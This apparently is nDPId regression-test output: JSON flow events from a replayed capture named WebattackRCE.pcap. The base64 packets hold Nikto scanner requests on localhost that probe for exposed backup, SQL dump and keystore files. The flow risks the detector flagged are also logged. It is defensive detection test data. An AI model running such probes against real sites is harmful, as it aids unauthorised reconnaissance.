-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277291,"pkt":"AAAAAAAAAAAAAAAACABFAADCVkJAAEAG5fF\/AAABfwAAAcSSH5BxEW7rgO+zGYAYAED+tgAAAQEICp1m\/VOdZv1SR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277292,"pkt":"AAAAAAAAAAAAAAAACABFAADC9VNAAEAGRuB\/AAABfwAAAcSUH5A3Js37LMn8joAYAED+tgAAAQEICp1m\/VSdZv1UR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277293,"pkt":"AAAAAAAAAAAAAAAACABFAADB0lRAAEAGaeB\/AAABfwAAAcSWH5D4eer6AmSqt4AYAED+tQAAAQEICp1m\/VWdZv1VR0VUIC8xLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277295,"pkt":"AAAAAAAAAAAAAAAACABFAADBgrRAAEAGuYB\/AAABfwAAAcSYH5BqProaPd\/PWYAYAED+tQAAAQEICp1m\/VedZv1XR0VUIC8xLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277296,"pkt":"AAAAAAAAAAAAAAAACABFAADFhERAAEAGt+x\/AAABfwAAAcSaH5DLx7zvpnN3coAYAED+uQAAAQEICp1m\/VidZv1YR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277298,"pkt":"AAAAAAAAAAAAAAAACABFAADFkbNAAEAGqn1\/AAABfwAAAcScH5DniakeYsnjE4AYAED+uQAAAQEICp1m\/VqdZv1aR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277299,"pkt":"AAAAAAAAAAAAAAAACABFAADATXFAAEAG7sR\/AAABfwAAAcSeH5C5OnXDLQhZdIAYAED+tAAAAQEICp1m\/VudZv1bR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277301,"pkt":"AAAAAAAAAAAAAAAACABFAADAvp1AAEAGfZh\/AAABfwAAAcSgH5BBBoY3\/wT40oAYAED+tAAAAQEICp1m\/V2dZv1dR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277302,"pkt":"AAAAAAAAAAAAAAAACABFAADG+c1AAEAGQmJ\/AAABfwAAAcSiH5Dkc8Fn99puBYAYAED+ugAAAQEICp1m\/V6dZv1eR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277304,"pkt":"AAAAAAAAAAAAAAAACABFAADGn2FAAEAGnM5\/AAABfwAAAcSkH5ABoKfybJgPqoAYAED+ugAAAQEICp1m\/WCdZv1gR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277306,"pkt":"AAAAAAAAAAAAAAAACABFAADBq8lAAEAGkGt\/AAABfwAAAcSmH5B085NqCLeHfoAYAED+tQAAAQEICp1m\/WGdZv1hR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 